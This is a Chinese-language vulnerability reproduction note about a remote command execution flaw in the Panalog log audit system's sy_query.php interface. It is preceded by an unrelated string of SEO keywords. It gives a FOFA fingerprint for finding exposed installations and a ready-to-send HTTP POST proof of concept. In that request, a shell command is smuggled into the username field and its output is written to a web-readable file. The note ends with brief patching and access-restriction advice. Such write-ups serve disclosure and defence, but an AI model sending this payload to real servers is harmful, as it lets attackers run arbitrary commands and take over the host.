手机优化网站建设,合肥学校网站建设,国内ui网站有哪些,WordPress发不出注册邮箱0x01 产品简介 Panalog是一款日志审计系统#xff0c;方便用户统一集中监控、管理在网的海量设备。
0x02 漏洞概述 Panalog日志审计系统 sy_query.php接口处存在远程命令执行漏洞#xff0c;攻击者可执行任意命令#xff0c;接管服务器权限。
0x03 复现环境
FOFA#xf…0x01 产品简介 Panalog是一款日志审计系统方便用户统一集中监控、管理在网的海量设备。
0x02 漏洞概述 Panalog日志审计系统 sy_query.php接口处存在远程命令执行漏洞攻击者可执行任意命令接管服务器权限。
0x03 复现环境
FOFAappPanabit-Panalog 0x04 漏洞复现
PoC
POST /account/sy_query.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: closeusername;whoami1.txt 查看命令执行结果 0x05 修复建议
⼚商已发布了漏洞修复程序请及时关注更新 https://www.panabit.com
通过防⽕墙等安全设备设置访问策略设置⽩名单访问。
如⾮必要禁⽌公⽹访问该系统。
